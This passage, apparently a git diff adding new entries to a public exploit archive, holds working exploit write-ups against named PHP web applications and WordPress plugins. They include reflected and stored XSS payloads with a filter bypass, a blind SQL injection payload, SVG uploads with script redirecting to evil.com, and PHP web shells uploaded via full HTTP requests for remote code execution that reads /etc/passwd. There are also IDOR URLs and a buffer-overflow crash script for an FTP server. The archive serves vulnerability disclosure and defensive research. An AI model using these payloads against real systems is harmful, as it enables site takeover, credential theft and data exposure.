+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4112
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /index.php
+
+URL parameter is vulnerable to RXSS
+
+https://website/index.php/gm5rj"><script>alert(1)</script>bwude?controller=pjAdmin&action=pjActionLogin&err=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51649.txt b/exploits/php/webapps/51649.txt
new file mode 100644
index 0000000000..0c1b68128e
--- /dev/null
+++ b/exploits/php/webapps/51649.txt
@@ -0,0 +1,30 @@
+# Exploit Title: PHPJabbers Service Booking Script 1.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 21/07/2023
+# Vendor: PHPJabbers
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/service-booking-script/
+# Version: 1.0
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4113
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /index.php
+
+GET parameter 'index' is vulnerable to RXSS
+
+https://website/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=[XSS]
\ No newline at end of file
diff --git a/exploits/php/webapps/51650.txt b/exploits/php/webapps/51650.txt
new file mode 100644
index 0000000000..52a1d2c5a8
--- /dev/null
+++ b/exploits/php/webapps/51650.txt
@@ -0,0 +1,30 @@
+# Exploit Title: PHPJabbers Night Club Booking 1.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 21/07/2023
+# Vendor: PHPJabbers
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/night-club-booking-software/
+# Version: 1.0
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4114
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /index.php
+
+GET parameter 'index' is vulnerable to RXSS
+
+https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
\ No newline at end of file
diff --git a/exploits/php/webapps/51651.txt b/exploits/php/webapps/51651.txt
new file mode 100644
index 0000000000..93fb468545
--- /dev/null
+++ b/exploits/php/webapps/51651.txt
@@ -0,0 +1,32 @@
+# Exploit Title: PHPJabbers Cleaning Business 1.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 21/07/2023
+# Vendor: PHPJabbers
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/cleaning-business-software/
+# Version: 1.0
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4115
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /index.php
+
+GET parameter 'index' is vulnerable to RXSS
+
+https://website/index.php?controller=pjFront&action=pjActionServices&locale=1&index=[XSS]
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51652.txt b/exploits/php/webapps/51652.txt
new file mode 100644
index 0000000000..36efe5adc0
--- /dev/null
+++ b/exploits/php/webapps/51652.txt
@@ -0,0 +1,33 @@
+# Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 22/07/2023
+# Vendor: PHPJabbers
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/taxi-booking-script/
+# Version: 2.0
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4116
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /index.php
+
+GET parameter 'index' is vulnerable to RXSS
+
+https://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS]
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51653.txt b/exploits/php/webapps/51653.txt
new file mode 100644
index 0000000000..d5bd908f37
--- /dev/null
+++ b/exploits/php/webapps/51653.txt
@@ -0,0 +1,33 @@
+# Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 22/07/2023
+# Vendor: PHPJabbers
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/
+# Version: 2.0
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4117
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /index.php
+
+GET parameter 'index' is vulnerable to RXSS
+
+https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51654.txt b/exploits/php/webapps/51654.txt
new file mode 100644
index 0000000000..8f8502413b
--- /dev/null
+++ b/exploits/php/webapps/51654.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Academy LMS 6.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 22/07/2023
+# Vendor: Creativeitem
+# Vendor Homepage: https://creativeitem.com/
+# Software Link: https://demo.creativeitem.com/academy/
+# Version: 6.0
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4119
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /academy/home/courses
+
+GET parameter 'query' is vulnerable to XSS
+
+https://website/academy/home/courses?query=[XSS]
+
+
+Path: /academy/home/courses
+
+GET parameter 'sort_by' is vulnerable to XSS
+
+https://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS]
+
+
+XSS Payloads (Blocked) :
+
+<script>alert(1)</script>
+ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd
+
+
+XSS Payload Bypass Filter :
+
+cplvz"><img src=a onerror=alert(1)>fk4ap
+
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51655.txt b/exploits/php/webapps/51655.txt
new file mode 100644
index 0000000000..1382b4bc6f
--- /dev/null
+++ b/exploits/php/webapps/51655.txt
@@ -0,0 +1,42 @@
+# Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection
+# Exploit Author: CraCkEr
+# Date: 29/07/2023
+# Vendor: adivaha - Travel Tech Company
+# Vendor Homepage: https://www.adivaha.com/
+# Software Link: https://wordpress.org/plugins/adiaha-hotel/
+# Demo: https://www.adivaha.com/demo/adivaha-online/
+# Version: 2.3
+# Tested on: Windows 10 Pro
+# Impact: Database Access
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+SQL injection attacks can allow unauthorized access to sensitive data, modification of
+data and crash the application or make it unavailable, leading to lost revenue and
+damage to a company's reputation.
+
+
+
+Path: /mobile-app/v3/
+
+GET parameter 'pid' is vulnerable to SQL Injection
+
+https://website/mobile-app/v3/?pid=[SQLI]&isMobile=chatbot
+
+---
+Parameter: pid (GET)
+Type: time-based blind
+Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+Payload: pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot
+---
+
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51656.txt b/exploits/php/webapps/51656.txt
new file mode 100644
index 0000000000..adb4f08375
--- /dev/null
+++ b/exploits/php/webapps/51656.txt
@@ -0,0 +1,101 @@
+# Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
+# Date: 3-8-2023
+# Category: Web Application
+# Exploit Author: Rajdip Dey Sarkar
+# Version: 3.3
+# Tested on: Windows/Kali
+# CVE: CVE-2023-39115
+
+
+
+Description:
+----------------
+
+An arbitrary file upload vulnerability in Campcodes Online Matrimonial
+Website System Script v3.3 allows attackers to execute arbitrary code via
+uploading a crafted SVG file.
+
+
+SVG Payload
+------------------
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
+http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
+stroke="#004400"/>
+   <script type="text/javascript">
+      alert("You have been hacked!!")
+
+
+      window.location.href="https://evil.com"
+   </script>
+</svg>
+
+
+Steps to reproduce
+--------------------------
+
+ -Login with your creds
+ -Navigate to this directory - /profile-settings
+ -Click on Gallery -> Add New Image -> Browser -> Add Files
+ -Choose the SVG file and upload done
+ -Click the image!! Payload Triggered
+
+
+Burp Request
+-------------------
+
+POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
+Gecko/20100101 Firefox/115.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
+Content-Type: multipart/form-data;
+boundary=---------------------------167707198418121100152548123485
+Content-Length: 1044
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
+Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;
+acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------167707198418121100152548123485
+Content-Disposition: form-data; name="relativePath"
+
+null
+-----------------------------167707198418121100152548123485
+Content-Disposition: form-data; name="name"
+
+file (1).svg
+-----------------------------167707198418121100152548123485
+Content-Disposition: form-data; name="type"
+
+image/svg+xml
+-----------------------------167707198418121100152548123485
+Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
+http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
+stroke="#004400"/>
+   <script type="text/javascript">
+      alert("You have been hacked!!")
+
+
+      window.location.href="https://evil.com"
+   </script>
+</svg>
+-----------------------------167707198418121100152548123485--
\ No newline at end of file
diff --git a/exploits/php/webapps/51658.txt b/exploits/php/webapps/51658.txt
new file mode 100644
index 0000000000..ae89659aeb
--- /dev/null
+++ b/exploits/php/webapps/51658.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
+# Date: 03.08.2023
+# Exploit Author: Miguel Santareno
+# Vendor Homepage: https://www.myeventon.com/
+# Version: 4.4
+# Tested on: Google and Firefox latest version
+# CVE : CVE-2023-2796
+
+# 1. Description
+The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
+
+
+# 2. Proof of Concept (PoC)
+Proof of Concept:
+https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value
\ No newline at end of file
diff --git a/exploits/php/webapps/51659.txt b/exploits/php/webapps/51659.txt
new file mode 100644
index 0000000000..6c343efa21
--- /dev/null
+++ b/exploits/php/webapps/51659.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR
+# Date: 03.08.2023
+# Exploit Author: Miguel Santareno
+# Vendor Homepage: https://www.myeventon.com/
+# Version: 4.4
+# Tested on: Google and Firefox latest version
+# CVE : CVE-2023-3219
+
+# 1. Description
+The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.
+
+
+# 2. Proof of Concept (PoC)
+Proof of Concept:
+https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=<any post id>
\ No newline at end of file
diff --git a/exploits/php/webapps/51660.txt b/exploits/php/webapps/51660.txt
new file mode 100644
index 0000000000..9fb8b03431
--- /dev/null
+++ b/exploits/php/webapps/51660.txt
@@ -0,0 +1,45 @@
+Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)
+Application: webutler Cms
+Version: v3.2
+Bugs:  RCE
+Technology: PHP
+Vendor URL: https://webutler.de/en
+Software Link: http://webutler.de/download/webutler_v3.2.zip
+Date of found: 03.08.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+1. login to account as admin
+2. go to visit media
+3.upload phar file
+4. upload poc.phar file
+
+poc.phar file contents :
+<?php echo system("cat /etc/passwd");?>
+5. Visit to poc.phar file
+poc request:
+
+POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1
+Host: localhost
+Content-Length: 40
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+X_FILENAME: poc.phar
+sec-ch-ua-platform: ""
+Accept: */*
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/webutler_v3.2/admin/browser/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropolu
+Connection: close
+
+<?php echo system("cat /etc/passwd");?>
\ No newline at end of file
diff --git a/exploits/php/webapps/51661.txt b/exploits/php/webapps/51661.txt
new file mode 100644
index 0000000000..1f4bf6cc75
--- /dev/null
+++ b/exploits/php/webapps/51661.txt
@@ -0,0 +1,45 @@
+Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
+Application: webedition Cms
+Version: v2.9.8.8
+Bugs:  RCE
+Technology: PHP
+Vendor URL: https://www.webedition.org/
+Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
+Date of found: 03.08.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps
+1. Login account
+2. Go to New -> Webedition page -> empty page
+3. Select php
+4. Set as "><?php echo system("cat /etc/passwd");?>  Description area
+
+Poc request:
+
+POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1
+Host: localhost
+Content-Length: 1621
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: iframe
+Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
+Connection: close
+
+we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51662.txt b/exploits/php/webapps/51662.txt
new file mode 100644
index 0000000000..62942f4613
--- /dev/null
+++ b/exploits/php/webapps/51662.txt
@@ -0,0 +1,58 @@
+Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS
+Application: Webedition CMS
+Version: v2.9.8.8
+Bugs:  Stored Xss
+Technology: PHP
+Vendor URL: https://www.webedition.org/
+Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
+Date of found: 03.08.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps
+1. Login to account
+2. Go to New ->  Media -> Image
+3. Upload malicious svg file
+svg file content:
+
+"""
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.location);
+   </script>
+</svg>
+"""
+
+
+Poc request:
+
+POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1
+Host: localhost
+Content-Length: 761
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: iframe
+Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
+Connection: close
+
+we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51663.txt b/exploits/php/webapps/51663.txt
new file mode 100644
index 0000000000..d0bc1e4711
--- /dev/null
+++ b/exploits/php/webapps/51663.txt
@@ -0,0 +1,35 @@
+# Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 29/07/2023
+# Vendor: adivaha - Travel Tech Company
+# Vendor Homepage: https://www.adivaha.com/
+# Software Link: https://wordpress.org/plugins/adiaha-hotel/
+# Demo: https://www.adivaha.com/demo/adivaha-online/
+# Version: 2.3
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+Path: /mobile-app/v3/
+
+GET parameter 'isMobile' is vulnerable to XSS
+
+https://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS]
+
+
+XSS Payload: clq95"><script>alert(1)</script>lb1ra
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51664.txt b/exploits/php/webapps/51664.txt
new file mode 100644
index 0000000000..2db8335ef7
--- /dev/null
+++ b/exploits/php/webapps/51664.txt
@@ -0,0 +1,100 @@
+# Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution
+# Date: 2023-07-20
+# Exploit Author: Mehmet Kelepçe
+# Vendor Homepage: https://wpmudev.com/project/forminator-pro/
+# Software Link: https://wordpress.org/plugins/forminator/
+# Version: 1.24.6
+# Tested on: PHP - Mysql - Apache2 - Windows 11
+
+HTTP Request and vulnerable parameter:
+-------------------------------------------------------------------------
+POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1
+Host: localhost
+Content-Length: 1756
+sec-ch-ua:
+Accept: */*
+Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundaryTmsFfkbegmAjomne
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199
+Safari/537.36
+sec-ch-ua-platform: ""
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: wp-settings-time-1=1689794282;
+wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR
+Connection: close
+
+.
+.
+.
+.
+.
+
+------WebKitFormBoundaryTmsFfkbegmAjomne
+Content-Disposition: form-data; name="postdata-1-post-image";
+filename="mehmet.php"
+Content-Type: application/octet-stream
+
+<?php
+$_GET['function']($_GET['cmd']);
+?>
+
+
+
+Source Code:
+wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php:
+--------------------------------------------------------------------
+        public function has_upload() {
+$fields = $this->get_fields();
+
+if ( ! empty( $fields ) ) {
+foreach ( $fields as $field ) {
+if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) {
+return true;
+}
+}
+}
+
+return false;
+}
+Vulnerable parameter: postdata-1-post-image
+
+and
+
+
+Source code:
+wp-content/plugins/forminator/library/fields/postdata.php:
+-------------------------------------------------------------------
+if ( ! empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) {
+if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty(
+$_FILES[ $image_field_name ]['name'] ) ) {
+$file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] );
+$valid     = wp_check_filetype( $file_name );
+
+if ( false === $valid['ext'] || ! in_array( $valid['ext'],
+$this->image_extensions ) ) {
+$this->validation_message[ $image_field_name ] = apply_filters(
+'forminator_postdata_field_post_image_nr_validation_message',
+esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ),
+$id
+);
+}
+}
+}
+
+Vulnerable function: $image_field_name
+-------------------------------------------------------------------------
+
+Payload file: mehmet.php
+<?php
+$_GET['function']($_GET['cmd']);
+?>
+-------------------------------------------------------------------------
\ No newline at end of file
diff --git a/exploits/windows/dos/51665.py b/exploits/windows/dos/51665.py
new file mode 100755
index 0000000000..4322714727
--- /dev/null
+++ b/exploits/windows/dos/51665.py
@@ -0,0 +1,29 @@
+# Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2023-08-04
+# Vendor Homepage: https://www.xlightftpd.com/
+# Software Link : https://www.xlightftpd.com/download/setup.exe
+# Tested Version: 3.9.3.6
+# Vulnerability Type: Buffer Overflow Local
+# Tested on OS: Windows XP Professional SP3 - Windows 11 x64
+
+# Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)
+
+# Steps to reproduce:
+# 1. - Download and Xlight FTP Server
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open Xlight FTP Server 3.9.3.6
+# 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup
+# 6. - Execute a Program after use logged in-  Paste the characters
+# 7  - Crashed
+
+#!/usr/bin/env python3
+
+exploit = 'A' * 294
+
+try:
+    with open("exploit.txt","w") as file:
+        file.write(exploit)
+    print("POC is created")
+except:
+    print("POC not created")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ee5130d6c7..cb511e66fe 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3853,6 +3853,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43871,exploits/hardware/remote/43871.py,"RAVPower 2.000.056 - Root Remote Code Execution",2018-01-24,"Daniele Linguaglossa & Stefano Farletti",remote,hardware,,2018-01-24,2018-01-26,0,CVE-2018-5997,,,,,
 18291,exploits/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS)",2011-12-30,cheffner,remote,hardware,,2011-12-30,2011-12-30,0,OSVDB-78282;CVE-2011-5053,,reaver-1.1.tar.gz,,,
 34802,exploits/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure",2010-10-04,"599eme Man",remote,hardware,,2010-10-04,2014-09-28,1,,,,,,https://www.securityfocus.com/bid/43685/info
